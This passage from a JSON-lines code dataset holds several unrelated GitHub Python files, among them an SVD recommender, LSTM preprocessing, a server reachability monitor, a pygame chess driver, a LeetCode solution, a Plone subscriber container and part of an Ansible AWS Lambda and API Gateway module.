#根据评分计算比率\n if simTotal == 0:\n return 0\n else:\n return ratSimTotal / simTotal\n\n#利用SVD\ndef svdEst(dataMat, user, simMeas, item):\n n = shape(dataMat)[1]\n simTotal = 0.0;ratSimTotal = 0.0\n U, Sigma, VT = la.svd(dataMat) #不同于stanEst函数,加入了SVD分解\n Sig4 = mat(eye(4) * Sigma[:4]) # 建立对角矩阵\n xformedItems = dataMat.T * U[:, :4] * Sig4.I #降维:变换到低维空间\n #下面依然是计算相似度,给出归一化评分\n for j in range(n):\n userRating = dataMat[user, j]\n if userRating == 0 or j == item: continue\n similarity = simMeas(xformedItems[item, :].T, xformedItems[j, :].T)\n print ('the %d and %d similarity is: %f' % (item, j, similarity))\n simTotal += similarity\n ratSimTotal += similarity * userRating\n if simTotal == 0:\n return 0\n else:\n return ratSimTotal / simTotal\n\n\ndef recommend(dataMat, user, N=3, simMeas=cosSim, estMethod=standEst):\n unratedItems = nonzero(dataMat[user, :].A == 0)[1] #寻找用户未评价的产品\n if len(unratedItems) == 0: return ('you rated everything')\n itemScores = []\n for item in unratedItems:\n estimatedScore = estMethod(dataMat, user, simMeas, item)#基于相似度的评分\n itemScores.append((item, estimatedScore))\n return sorted(itemScores, key=lambda jj: jj[1], reverse=True)[:N]\n\n\n#实例:SVD实现图像压缩\n\n#打印矩阵。由于矩阵包含了浮点数,因此必须定义浅色和深色。\ndef printMat(inMat, thresh=0.8):\n for i in range(32):\n for k in range(32):\n if float(inMat[i,k]) > thresh:\n print (1,)\n else: print (0,)\n print ('')\n\n#压缩\ndef imgCompress(numSV=3, thresh=0.8):\n myl = []\n for line in open('0_5.txt').readlines():\n newRow = []\n for i in range(32):\n newRow.append(int(line[i]))\n myl.append(newRow)\n myMat = mat(myl)\n print (\"****original matrix******\")\n #printMat(myMat, thresh)\n U,Sigma,VT = la.svd(myMat) #SVD分解\n SigRecon = mat(zeros((numSV, numSV))) #创建初始特征\n for k in range(numSV):#构造对角矩阵\n SigRecon[k,k] = Sigma[k]\n reconMat = U[:,:numSV]*SigRecon*VT[:numSV,:]\n print (\"****reconstructed matrix using %d singular values******\" % numSV)\n #printMat(reconMat, thresh)","repo_name":"stonycat/ML-in-Action-Code-and-Note","sub_path":"ch14/svdRec.py","file_name":"svdRec.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"70"}
+{"seq_id":"31787352588","text":"import numpy as np\nfrom .preprocessing import Preprocessing\nimport train\n\n\n# convert history into inputs and outputs\ndef to_supervised(train, n_input, n_out):\n # flatten data\n data = train.reshape((train.shape[0] * train.shape[1], train.shape[2]))\n X, y = list(), list()\n in_start = 0\n # step over the entire history one time step at a time\n for _ in range(len(data)):\n # define the end of the input sequence\n in_end = in_start + n_input\n out_end = in_end + n_out\n # ensure we have enough data for this instance\n if out_end < len(data):\n x_input = data[in_start:in_end, :]\n # x_input = x_input.reshape((len(x_input), x_input.shape[1]))\n X.append(x_input)\n y.append(data[in_end:out_end, 0])\n # move along one time step\n in_start += n_out\n\n return np.array(X), np.array(y)\n\n\ndef load_lstm_data(folder, filename, batch_size, n_output, split_set=True):\n df = Preprocessing.load_df(folder, filename)\n df['last_updated'] = df['last_updated'].astype(np.datetime64)\n if split_set:\n train_set, val_set, test_set , train_set_last, val_set_last, test_set_last = \\\n train.train_val_test_split(df, batch_size, 0.1, 0.1)\n x_train, y_train = to_supervised(train_set, batch_size, n_output)\n #x_train_last, y_train_last = to_supervised(train_set_last, len(train_set_last), n_output)\n x_val, y_val = to_supervised(train_set, batch_size, n_output)\n #x_val_last, y_val_last = to_supervised(val_set_last, len(val_set_last), n_output)\n x_test, y_test = to_supervised(train_set, batch_size, n_output)\n #x_test_last, y_test_last = to_supervised(test_set_last, len(test_set_last), n_output)\n return x_train, x_val, x_test, y_train, y_val, y_test\n\n else:\n data_set, data_set_last = train.prepare_single_set(df, batch_size)\n x, y = to_supervised(data_set, batch_size, n_output)\n #x_last, y_last = to_supervised(data_set_last, len(data_set_last), n_output)\n\n return x, y\n","repo_name":"CMootz/week_program","sub_path":"src/Preprocessing/prepare_lstm.py","file_name":"prepare_lstm.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71275941987","text":"from datetime import datetime\nfrom adapters import NetworkAdapter\nimport time\nimport re\n\n\nclass ServerMonitor:\n def __init__(self, config_file: list, network_adapter: NetworkAdapter):\n self.config = config_file\n self.network_adapter = network_adapter\n\n @staticmethod\n def is_host_ip(host: str) -> bool:\n # Проверка, является ли переданный хост IP-адресом\n ip_pattern = r'^(\\d{1,3}\\.){3}\\d{1,3}$'\n if re.match(ip_pattern, host):\n octets = host.split('.')\n if all(int(octet) < 256 for octet in octets):\n return True\n return False\n\n @staticmethod\n def is_valid_host(host: str) -> bool:\n # Проверка, является ли переданный хост допустимым IP-адресом или доменным именем\n hostname_pattern = r'^[a-zA-Z0-9]+([\\-.]{1}[a-zA-Z0-9]+)*\\.[a-zA-Z]{2,20}$'\n special_domains = ['localhost', 'broadcasthost']\n\n if host in special_domains:\n return True\n\n if ServerMonitor.is_host_ip(host):\n return True\n\n if re.match(hostname_pattern, host):\n return True\n\n return False\n\n @staticmethod\n def validate_input_data(input_data: list) -> bool:\n # Валидация данных входного файла\n validation_result = True\n for row_number, entry in enumerate(input_data, 2):\n host, port_list = entry\n if ServerMonitor.is_valid_host(host):\n if not host and port_list:\n print(f\"Некорректные входные данные: отсутствует доменное имя. Строка {row_number}\")\n if not host and not port_list:\n print(f\"Некорректные входные данные: и доменное имя, и порт отсутствуют. Строка {row_number}\")\n validation_result = False\n if port_list:\n for port in port_list:\n if not port.isdigit() or int(port) < 0 or int(port) > 65535:\n print(f\"Некорректные входные данные: недопустимый порт '{port}'. Строка {row_number}\")\n validation_result = False\n else:\n print(f\"Некорректные входные данные: неверный IP-адрес '{host}'. Строка {row_number}\")\n validation_result = False\n return validation_result\n\n def is_internet_available(self) -> bool:\n # Проверка доступности интернет-соединения\n internet_rtt_check = self.network_adapter.get_rtt('8.8.8.8')\n if internet_rtt_check is not None and internet_rtt_check < 2000:\n return True\n else:\n return False\n\n def monitor_server(self, host: str, ports: list) -> None:\n # Функция мониторинга сервера\n if not self.is_internet_available():\n print(\"Отсутсвует интернет-соединение. Ждем восстановление доступа.\")\n while not self.is_internet_available():\n time.sleep(10) # Check every 10 seconds\n print(\"Интернет-соединение восстановлено.\\n\")\n\n ips = list(set(self.network_adapter.resolve_domain(host))) if host else ['']\n if not host or self.is_host_ip(host):\n host = '???'\n print(f\"['{host}', {ips}, {ports}]\")\n for ip in ips:\n lost_packets = self.network_adapter.ping(ip)\n rtt = self.network_adapter.get_rtt(ip) if lost_packets != 100 else None\n open_ports = self.network_adapter.check_ports(ip, ports) if ports else []\n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')\n if not ports:\n print(f\"{timestamp} | {host} | {ip} | {lost_packets} | {rtt} ms | -1 | ???\")\n else:\n for port in ports:\n status = 'Opened' if port in open_ports else 'Unknown'\n if port == '443':\n cert_status = self.network_adapter.check_certificate(host if host != '???' else ip)\n print(f\"{timestamp} | {host} | {ip} | {lost_packets} | {rtt} ms | {port} | {status} \"\n f\"| {cert_status}\")\n else:\n print(f\"{timestamp} | {host} | {ip} | {lost_packets} | {rtt} ms | {port} | {status}\")\n print()\n\n def monitor(self) -> None:\n # Функция мониторинга всех серверов из файла конфигурации\n for host, ports in self.config:\n self.monitor_server(host, ports)\n","repo_name":"GoshkaLP/tbo_python2023","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"74586932066","text":"# Driver file\n# Handling user input & displaying current GameState\n\nimport pygame as p\nfrom Engine import GameState, Move\n\np.init()\nWIDTH = HEIGHT = 512 # 400 other option\nDIMENSION = 8\nSQ_SIZE = HEIGHT // DIMENSION\nMAX_FPS = 15\nIMAGES = {}\n\n# Init global dictionary of images. Called once in main\n\n\ndef load_images():\n pieces = [\"wp\", \"wR\", \"wN\", \"wB\", \"wQ\",\n \"wK\", \"bp\", \"bR\", \"bN\", \"bB\", \"bQ\", \"bK\"]\n\n for piece in pieces:\n IMAGES[piece] = p.transform.scale(\n p.image.load(f\"img/{piece}.png\"), (SQ_SIZE, SQ_SIZE))\n\n\ndef draw_board(screen):\n colors = [p.Color(\"white\"), p.Color(\"dark green\")]\n for r in range(DIMENSION):\n for c in range(DIMENSION):\n color = colors[((r+c) % 2)]\n p.draw.rect(screen, color, p.Rect(\n c*SQ_SIZE, r*SQ_SIZE, SQ_SIZE, SQ_SIZE))\n\n\ndef draw_pieces(screen, board):\n for r in range(DIMENSION):\n for c in range(DIMENSION):\n piece = board[r][c]\n if piece != \"--\":\n screen.blit(IMAGES[piece], p.Rect(\n c*SQ_SIZE, r*SQ_SIZE, SQ_SIZE, SQ_SIZE))\n\n\n# Responsible for all graphics within current gamestate\ndef draw_game_state(screen, gs):\n draw_board(screen)\n draw_pieces(screen, gs.board)\n\n\n# Main driver for our code. Handle user input & updating graphics\ndef main():\n p.init()\n screen = p.display.set_mode((WIDTH, HEIGHT))\n clock = p.time.Clock()\n # screen.fill(p.Color(\"White\"))\n gs = GameState()\n\n validMoves = gs.get_valid_moves()\n moveMade = False # flag variable for made move\n\n load_images()\n\n sqSelected = () # last click of the user\n playerClicks = [] # Keep track of clicks [(6,4), (4,4)]\n\n running = True\n while running:\n for e in p.event.get():\n if e.type == p.QUIT:\n running = False\n # mouse handler\n elif e.type == p.MOUSEBUTTONDOWN:\n location = p.mouse.get_pos() # (x,y) location of mouse\n col = location[0]//SQ_SIZE\n row = location[1]//SQ_SIZE\n if sqSelected == (row, col):\n sqSelected = ()\n playerClicks = []\n else:\n sqSelected = (row, col)\n playerClicks.append(sqSelected)\n if len(playerClicks) == 2:\n move = Move(playerClicks[0], playerClicks[1], gs.board)\n for i in range(len(validMoves)):\n if move == validMoves[i]:\n gs.make_move(validMoves[i])\n print(move.get_chess_notation())\n moveMade = True\n sqSelected = () # reset user clicks\n playerClicks = []\n if not moveMade:\n playerClicks = [sqSelected]\n\n # key handler\n elif e.type == p.KEYDOWN:\n if e.key == p.K_u:\n gs.undo_move()\n moveMade = True\n if moveMade:\n validMoves = gs.get_valid_moves()\n moveMade = False\n draw_game_state(screen, gs)\n clock.tick(MAX_FPS)\n p.display.flip()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"berkan-alci/Python_Chess_Engine","sub_path":"logic/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"37477254039","text":"'''\n4. Median of Two Sorted Arrays\nHard\n\nGiven two sorted arrays nums1 and nums2 of size m and n respectively, return the\nmedian of the two sorted arrays.\n\nFollow up: The overall run time complexity should be O(log (m+n)).\n\n\n\nExample 1:\n\nInput: nums1 = [1,3], nums2 = [2]\nOutput: 2.00000\nExplanation: merged array = [1,2,3] and median is 2.\nExample 2:\n\nInput: nums1 = [1,2], nums2 = [3,4]\nOutput: 2.50000\nExplanation: merged array = [1,2,3,4] and median is (2 + 3) / 2 = 2.5.\nExample 3:\n\nInput: nums1 = [0,0], nums2 = [0,0]\nOutput: 0.00000\nExample 4:\n\nInput: nums1 = [], nums2 = [1]\nOutput: 1.00000\nExample 5:\n\nInput: nums1 = [2], nums2 = []\nOutput: 2.00000\n\n\nConstraints:\n\nnums1.length == m\nnums2.length == n\n0 <= m <= 1000\n0 <= n <= 1000\n1 <= m + n <= 2000\n-106 <= nums1[i], nums2[i] <= 106\n\n'''\n\n\nclass Solution:\n\n # Time O(log(min(M,N))), Space O(1), runtime = 88 ms\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n\n if not nums1 and not nums2: return -1\n\n # assume nums1 is the smallest array\n size1 = len(nums1)\n size2 = len(nums2)\n if size1 > size2:\n size1, size2 = size2, size1\n nums1, nums2 = nums2, nums1\n\n # binary search to find the partition\n lo, hi = 0, size1\n while lo <= hi:\n mid1 = (lo + hi) // 2\n mid2 = (size1 + size2 + 1) // 2 - mid1\n\n l1_index = mid1 - 1\n r1_index = mid1\n l2_index = mid2 - 1\n r2_index = mid2\n\n l1 = nums1[l1_index] if mid1 != 0 else float('-inf')\n r1 = nums1[r1_index] if mid1 != size1 else float('inf')\n l2 = nums2[l2_index] if mid2 != 0 else float('-inf')\n r2 = nums2[r2_index] if mid2 != size2 else float('inf')\n\n if l2 <= r1 and l1 <= r2:\n # calculate the median value\n if (size1 + size2) % 2:\n return max(l1, l2)\n else:\n a = max(l1, l2)\n b = min(r1, r2)\n return (a + b) / 2\n\n elif l1 > r2:\n hi = mid1 - 1\n\n else:\n lo = mid1 + 1\n","repo_name":"jjingdong/LeetCode","sub_path":"4MedianOfTwoSortedArrays.py","file_name":"4MedianOfTwoSortedArrays.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"70"}
+{"seq_id":"9364631702","text":"import persistent\nfrom zope.interface import implements\nfrom BTrees.OOBTree import OOBTree\nfrom BTrees.Length import Length\n\nfrom collective.subscribe.interfaces import IItemSubscriber, ISubscribers\nfrom collective.subscribe.utils import bind_field_properties\n\n\nclass ItemSubscriber(persistent.Persistent):\n \"\"\"Item subscriber implementation\"\"\"\n\n implements(IItemSubscriber)\n\n bind_field_properties(locals(), IItemSubscriber) # props from field schema\n\n def __init__(self, **kwargs):\n \"\"\"\n Construct, if keyword arguments are used to construct, validate\n invariant on passed field values.\n \"\"\"\n if kwargs:\n user = kwargs.get('user', None)\n name = kwargs.get('name', None)\n namespace = kwargs.get('namespace', 'member')\n email = kwargs.get('email', None)\n if isinstance(user, unicode):\n user = user.encode('utf-8')\n self.user = user\n if isinstance(email, unicode):\n email = email.encode('utf-8')\n self.email = email\n if isinstance(name, str):\n name = name.decode('utf-8')\n self.name = name\n if isinstance(namespace, unicode):\n namespace = namespace.encode('utf-8')\n self.namespace = namespace\n IItemSubscriber.validateInvariants(self)\n\n def signature(self):\n \"\"\"\n return two-string tuple signature of (namespace, user or email); can\n be used as a composed key for storage implementations. Raises a\n zope.interface.Invalid exception if signature is not possible due to\n insufficient field data.\n \"\"\"\n IItemSubscriber.validateInvariants(self) # may raise Invalid...\n namespace = self.namespace\n identifier = self.user\n if self.email and not self.user:\n namespace = 'email' # ignore field default\n identifier = self.email\n return (namespace, identifier)\n\n\nclass SubscribersContainer(OOBTree):\n \"\"\"Container/mapping for subscribers\"\"\"\n implements(ISubscribers)\n\n def __init__(self, *args, **kwargs):\n super(SubscribersContainer, self).__init__(*args, **kwargs)\n self.size = Length()\n\n # wrap superclass __getstate__ and __setstate__ to save attrs such\n\n def __getstate__(self):\n tree_state = super(SubscribersContainer, self).__getstate__()\n attr_state = [(k, v) for k, v in self.__dict__.items()\n if not (k.startswith('_v_') or k.startswith('__'))]\n return (tree_state, attr_state)\n\n def __setstate__(self, v):\n tree_state = v[0]\n attr_state = v[1]\n for k, v in attr_state:\n setattr(self, k, v)\n super(SubscribersContainer, self).__setstate__(tree_state)\n\n def _normalize_key(self, key):\n \"\"\"\n given key or object providing IItemSubscriber, normalize unique key\n \"\"\"\n if IItemSubscriber.providedBy(key):\n key = key.signature()\n elif isinstance(key, basestring):\n key = ('email', str(basestring))\n if not (len(key) == 2 and key[0] and key[1]):\n raise KeyError('incomplete key for subscriber')\n return key\n\n def _set_new(self, key, value):\n \"\"\"set new item, but do not allow replacing existing item\"\"\"\n if key in self:\n raise ValueError('attempt to add: duplicate key; record exists')\n self.__setitem__(key, value)\n\n def add(self, *args, **kwargs):\n k = None\n fields = kwargs\n if not kwargs and len(args) == 1:\n v = args[0]\n if IItemSubscriber.providedBy(v):\n k = self._normalize_key(v)\n if isinstance(v, persistent.Persistent):\n self._set_new(k, v)\n return k, v\n fields = v.__dict__ # we'll copy values, not object to store\n # otherwise, assume a dict from args[0]:\n else:\n try:\n fields = dict(v)\n except ValueError:\n import sys\n exc_info = sys.exc_info()\n raise (KeyError, exc_info[1], exc_info[2]) # noqa\n v = ItemSubscriber(**fields)\n if k is None:\n k = self._normalize_key(v)\n self._set_new(k, v)\n return k, v\n\n # Callers should not use __setitem__ -- it is here as a check\n # on keeping a BTree size/length extrinsic to the BTree itself.\n def __setitem__(self, key, value):\n if not IItemSubscriber.providedBy(value):\n raise ValueError('__setitem__ value must provide IItemSubscriber')\n if key not in self:\n self.size.change(1) # increment\n super(SubscribersContainer, self).__setitem__(key, value)\n\n def get(self, subscriber, default=None):\n key = self._normalize_key(subscriber)\n return super(SubscribersContainer, self).get(key, default)\n\n def __getitem__(self, key):\n key = self._normalize_key(key)\n return super(SubscribersContainer, self).__getitem__(key)\n\n def __len__(self):\n return self.size()\n\n def __contains__(self, key):\n normalized = self._normalize_key(key)\n if IItemSubscriber.providedBy(key):\n if key is not super(SubscribersContainer, self).get(normalized,\n None):\n return False\n key = self._normalize_key(normalized)\n return super(SubscribersContainer, self).__contains__(normalized)\n\n def __delitem__(self, key):\n key = self._normalize_key(key)\n super(SubscribersContainer, self).__delitem__(key)\n self.size.change(-1) # decrement if superclass __delitem__ succeeds\n\n","repo_name":"collective/collective.subscribe","sub_path":"collective/subscribe/subscriber.py","file_name":"subscriber.py","file_ext":"py","file_size_in_byte":5815,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"21308046024","text":"#!/usr/bin/python\n# from collections import defaultdict\nimport os\nimport datetime\nfrom datetime import datetime as dtime\n# import time\n\nDOCUMENTATION = '''\n---\nmodule: cr_lambda_triggers\nshort_description: Creates, updates or deletes AWS Lambda function event mappings.\ndescription:\n - This module allows the management of AWS Lambda function event source mappings such as S3 bucket\n events, DynamoDB and Kinesis streaming events via the Ansible framework.\n It is idempotent and supports \"Check\" mode. Use module M(lambda) to manage the lambda\n function itself and M(lambda_alias) to manage function aliases.\nversion_added: \"2.1\"\nauthor: Robert Colvin (@rcolvin)\noptions:\n aws_access_key:\n description:\n - AWS access key id. If not set then the value of the AWS_ACCESS_KEY environment variable is used.\n required: false\n default: null\n aliases: [ 'ec2_access_key', 'access_key' ]\n aws_secret_key:\n description:\n - AWS secret key. If not set then the value of the AWS_SECRET_KEY environment variable is used.\n required: false\n default: null\n aliases: ['ec2_secret_key', 'secret_key']\n lambda_function_arn:\n description:\n - The name or ARN of the lambda function.\n required: true\n aliases: ['function_name', 'function_arn']\n state:\n description:\n - Describes the desired state and defaults to \"present\".\n required: true\n default: \"present\"\n choices: [\"present\", \"absent\"]\n alias:\n description:\n - Name of the function alias. Mutually exclusive with C(version).\n required: true\n version:\n description:\n - Version of the Lambda function. Mutually exclusive with C(alias).\n required: false\n event_source:\n description:\n - Source of the event that triggers the lambda function.\n required: true\n choices: ['s3', 'Kinesis', 'DynamoDB', 'SNS']\n source_params:\n description:\n - Sub-parameters required for event source.\n - I(== S3 event source ==)\n - C(id) Unique ID for this source event.\n - C(bucket) Name of source bucket.\n - C(prefix) Bucket prefix (e.g. images/)\n - C(suffix) Bucket suffix (e.g. log)\n - C(events) List of events (e.g. ['s3:ObjectCreated:Put'])\n - I(== stream event source ==)\n - C(source_arn) The Amazon Resource Name (ARN) of the Kinesis or DynamoDB stream that is the event source.\n - C(enabled) Indicates whether AWS Lambda should begin polling the event source. Default is True.\n - C(batch_size) The largest number of records that AWS Lambda will retrieve from your event source at the\n time of invoking your function. Default is 100.\n - C(starting_position) The position in the stream where AWS Lambda should start reading.\n Choices are TRIM_HORIZON or LATEST.\n - I(== SNS event source ==)\n - C(id) Unique ID for this source event.\n - C(topic_arn) The ARN of the topic to which you want to subscribe the lambda function.\n required: true\n requirements:\n - boto3\n extends_documentation_fragment:\n - aws\n\n'''\n\nEXAMPLES = '''\n- name: update/EXISTS [API RESOURCE] \n cr_apigw_set:\n apigw_type: \"resource\"\n name: \"{{ item.name }}\" ##name of the API\n path: \"{{ item.path }}\" ##FULL PATH of resource. use \"/\" for root\n state: \"{{ item.state }}\"\n with_items: \"{{ project.api_gw }}\"\n- name: update [API RESOURCE] [METHOD]\n cr_apigw_set:\n apigw_type: \"method\"\n name: \"{{ item.name }}\" ##name of the API\n path: \"{{ item.path }}\"\n operationName: \"{{ item.operational_name }}\"\n requestParameters: \"{{ item.request_params }}\"\n requestModels: \"{{ item.request_models }}\"\n responseModels: \"{{ item.response_models }}\"\n authorizationScopes: \"{{ item.auth_scope }}\"\n authName: \"{{item.authName}}\"\n apiKeyRequired: \"{{ item.apiKeyRequired }}\"\n authorizationType: \"{{ item.authorizationType }}\"\n httpMethod: \"{{ item.httpMethod }}\" ##GET, POST, other...\n state: \"{{ item.state }}\"\n integration: \"{{ item.method_integration }}\"\n response: \"{{ item.method_response }}\"\n with_items: \"{{ project.api_gw }}\"\n'''\n\n\ntry:\n import boto3\n from botocore.exceptions import ClientError, MissingParametersError, ParamValidationError\n HAS_BOTO3 = True\n\n from botocore.client import Config\nexcept ImportError:\n import boto\n HAS_BOTO3 = False\ndir_path = os.path.dirname(__file__)\n#\n\n\ndef file_append(path, filename, msg):\n with open(\"%s/LOG-%s.txt\" % (path, filename), \"a\") as file:\n file.write(\"\\n%s\" % (msg))\n# create a policy given actionPolicy object\n\n\ndef cr_apigw(state, module, client, name=None, resource=None, actionPolicy=None, description=None):\n pName = name\n found = True\n\n return [pName], False if found else True\n\n\ndef resource_gen(module, client, pathPart, apiId, pId):\n try:\n resource = client.create_resource(restApiId=apiId, parentId=pId, pathPart=pathPart)\n except ClientError as e:\n module.fail_json(msg=\"[E] resource_gen failed - {0}\".format(e.response['Error']['Message']))\n return resource\n\n\ndef getAllResources(client, restApiId, position=None):\n rlist = []\n if position is None:\n response = client.get_resources(restApiId=restApiId, limit=500)\n else:\n response = client.get_resources(restApiId=restApiId, position=position, limit=500)\n baseList = response['items']\n if \"position\" in response:\n rlist = getAllResources(client, restApiId, response['position'], prevlist=[])\n final = baseList + rlist\n return final\n\n\ndef cr_dynamo_event(state, module, client, clientstreams, event_source, function_name, source_params):\n found = True\n streams = client.list_event_source_mappings(FunctionName=function_name)['EventSourceMappings']\n targetStream = None\n UUID = None\n eventObj = None\n for stream in streams:\n streamSource = stream['EventSourceArn']\n if event_source in streamSource:\n targetStream = streamSource\n UUID = stream['UUID']\n eventObj = stream\n break\n\n if state == 'absent': # delete\n if targetStream: # already missing skip\n try:\n client.delete_event_source_mapping(UUID=UUID)\n except ClientError as e:\n module.fail_json(msg=\"[E] dynamo trigger DELETE failed {0} - {1}\".format(event_source, e.response['Error']['Message']))\n\n else: # add\n params = eventObjConform(module, source_params)\n enabled = params['enabled']\n batch_size = params['batch_size']\n starting_position = params['starting_position']\n MaximumBatchingWindowInSeconds = params['MaximumBatchingWindowInSeconds']\n\n ParallelizationFactor = params['ParallelizationFactor']\n DestinationConfig = params['DestinationConfig']\n\n MaximumRecordAgeInSeconds = params['MaximumRecordAgeInSeconds']\n BisectBatchOnFunctionError = params['BisectBatchOnFunctionError']\n MaximumRetryAttempts = params['MaximumRetryAttempts']\n\n if not targetStream:\n table = event_source.split(\"/\")[-1]\n targetStream = getTableStream(state, module, clientstreams, table)\n if eventObj:\n if MaximumBatchingWindowInSeconds != eventObj['MaximumBatchingWindowInSeconds']:\n eventObj.update({\"MaximumBatchingWindowInSeconds\": MaximumBatchingWindowInSeconds})\n found = False\n if BisectBatchOnFunctionError != eventObj['BisectBatchOnFunctionError']:\n eventObj.update({\"BisectBatchOnFunctionError\": BisectBatchOnFunctionError})\n found = False\n if not found:\n try:\n client.update_event_source_mapping(**eventObj)\n except ClientError as e:\n module.fail_json(msg=\"[E] dynamo trigger DELETE failed {0} - {1}\".format(event_source, e.response['Error']['Message']))\n else:\n try:\n if 'StartingPositionTimestamp' in params:\n StartingPositionTimestamp = params['StartingPositionTimestamp']\n if StartingPositionTimestamp == 0 or StartingPositionTimestamp == '0':\n year = dtime.today().year\n StartingPositionTimestamp = dtime(year, 1, 1)\n else:\n StartingPositionTimestamp = dtime.utcfromtimestamp(StartingPositionTimestamp)\n else:\n year = dtime.today().year\n StartingPositionTimestamp = dtime(year, 1, 1)\n params_obj = {\"EventSourceArn\": targetStream, \"FunctionName\": function_name,\n \"Enabled\": enabled, \"BatchSize\": batch_size,\n \"MaximumBatchingWindowInSeconds\": MaximumBatchingWindowInSeconds,\n \"ParallelizationFactor\": ParallelizationFactor,\n \"StartingPosition\": starting_position,\n \"DestinationConfig\": DestinationConfig,\n \"MaximumRecordAgeInSeconds\": MaximumRecordAgeInSeconds,\n \"BisectBatchOnFunctionError\": BisectBatchOnFunctionError,\n \"MaximumRetryAttempts\": MaximumRetryAttempts\n\n }\n if starting_position == \"AT_TIMESTAMP\":\n params_obj.update({\"StartingPositionTimestamp\": StartingPositionTimestamp})\n\n client.create_event_source_mapping(**params_obj)\n found = False\n except ClientError as e:\n module.fail_json(msg=\"[E] dynamo trigger DELETE failed {0} - {1}\".format(event_source, e.response['Error']['Message']))\n\n return [event_source], False if found else True\n\n\ndef getTableStream(state, module, clientstreams, table):\n # dynoClient = boto3.client(\"dynamodbstreams\")\n streams = clientstreams.list_streams(TableName=table)['Streams']\n for stream in streams:\n return stream['StreamArn']\n\n\ndef eventObjConform(module, source_params):\n params = source_params\n\n enabled = params['enabled']\n # module.fail_json(msg=\"[E] dynamo trigger DELETE failed {0} - {1}\".format(enabled, params))\n\n batch_size = int(params['batch_size'])\n starting_position = params['starting_position']\n MaximumBatchingWindowInSeconds = int(params['MaximumBatchingWindowInSeconds'])\n\n ParallelizationFactor = int(params['ParallelizationFactor'])\n if ParallelizationFactor == 0:\n ParallelizationFactor = 1\n DestinationConfig = params['DestinationConfig']\n if isinstance(DestinationConfig, str):\n DestinationConfig = params['DestinationConfig']\n onfailure = False\n onsuccess = False\n if 'OnFailure' in DestinationConfig:\n if DestinationConfig['OnFailure']:\n onfailure = True\n if 'OnSuccess' in DestinationConfig:\n if DestinationConfig['OnSuccess']:\n onsuccess = True\n if not onsuccess and not onfailure:\n DestinationConfig = {}\n\n MaximumRecordAgeInSeconds = int(params['MaximumRecordAgeInSeconds'])\n if MaximumRecordAgeInSeconds == 0:\n MaximumRecordAgeInSeconds = 60000\n BisectBatchOnFunctionError = params['BisectBatchOnFunctionError']\n if BisectBatchOnFunctionError == 0 or BisectBatchOnFunctionError == '0':\n BisectBatchOnFunctionError = False\n else:\n BisectBatchOnFunctionError = True\n # module.fail_json(msg=\"[E] dynamo trigger DELETE failed {0} - {1}\".format(BisectBatchOnFunctionError, params))\n MaximumRetryAttempts = int(params['MaximumRetryAttempts'])\n\n obj = {\n \"enabled\": enabled,\n \"batch_size\": batch_size,\n \"starting_position\": starting_position,\n \"MaximumBatchingWindowInSeconds\": MaximumBatchingWindowInSeconds,\n \"ParallelizationFactor\": ParallelizationFactor,\n \"DestinationConfig\": DestinationConfig,\n \"MaximumRecordAgeInSeconds\": MaximumRecordAgeInSeconds,\n \"BisectBatchOnFunctionError\": BisectBatchOnFunctionError,\n \"MaximumRetryAttempts\": MaximumRetryAttempts\n }\n return obj\n\n\ndef cr_resource(state, module, client, name, path, description):\n found = True\n apiFound = api_exists(module, name, client)\n if apiFound is None:\n module.fail_json(msg=\"[E] cr_resource API name - {0} not found\".format(name))\n restApiId = apiFound[\"id\"]\n # rlist = client.get_resources( restApiId=restApiId, limit=500)['items']\n rlist = getAllResources(client, restApiId)\n # pId = None\n pathPart = path.rsplit('/', 1)[-1] # users\n parentPath = path.rsplit('/', 1)[-2]\n dictPath = {}\n for rs in rlist:\n parentID = pPart = None\n if 'parentId' in rs:\n parentID = rs['parentId']\n if 'pathPart' in rs:\n pPart = rs['pathPart']\n dictPath.update({rs['path']: {'pid': parentID, 'pathPart': pPart, 'id': rs['id']}})\n\n if pathPart == \"\" and pathPart == parentPath: # root update here so nothing required\n return [path], False if found else True\n if path in dictPath: # already exists. return without change\n return [path], False if found else True\n if parentPath == \"\": # root level so no update as needed\n for k, v in dictPath.items():\n rootPath = k.rsplit('/', 1)[-2]\n if path == rootPath: # root level CONFIRMED so no update as needed\n # # module.fail_json(msg=\"[T] cr_resource API - {0} set as\".format(found))\n return [path], False if found else True\n\n # module.fail_json(msg=\"[T] cr_resource API - {0}===={1}===={2}===={3} {4}\".format(dictPath,pathPart,parentPath,restApiId, path))\n\n sPath = path.split(\"/\")\n lastpath = \"\"\n lastId = dictPath['/']['id']\n attempts = len(sPath)\n found = False\n for n in range(attempts):\n if not sPath[n] == \"\":\n lastpath = lastpath + \"/\" + sPath[n]\n if lastpath in dictPath: # found ..update lastID and continue\n lastId = dictPath[lastpath]['id']\n continue\n rPart = lastpath.rsplit('/', 1)[-1]\n rsrc = resource_gen(module, client, rPart, restApiId, lastId)\n dictPath.update({lastpath: {'pid': lastId, 'pathPart': rPart, 'id': rsrc['id']}})\n lastId = rsrc['id']\n\n return [path], False if found else True\n\n\ndef getAll_rest_apis(client, position=None):\n rlist = []\n if position is None:\n response = client.get_rest_apis(limit=500)\n else:\n response = client.get_rest_apis(limit=500)\n baseList = response['items']\n if \"position\" in response:\n rlist = getAll_rest_apis(client, response['position'], prevlist=[])\n final = baseList + rlist\n return final\n\n\ndef api_exists(module, name, client):\n # client = boto3.client('apigateway')\n api = None\n # response = client.get_rest_apis( limit=450 )['items']\n response = getAll_rest_apis(client)\n for item in response:\n if item['name'].lower() == name.lower():\n #module.fail_json(msg=\"[T] name:'{0}' - '{1}' not found\".format(name,item['name']))\n 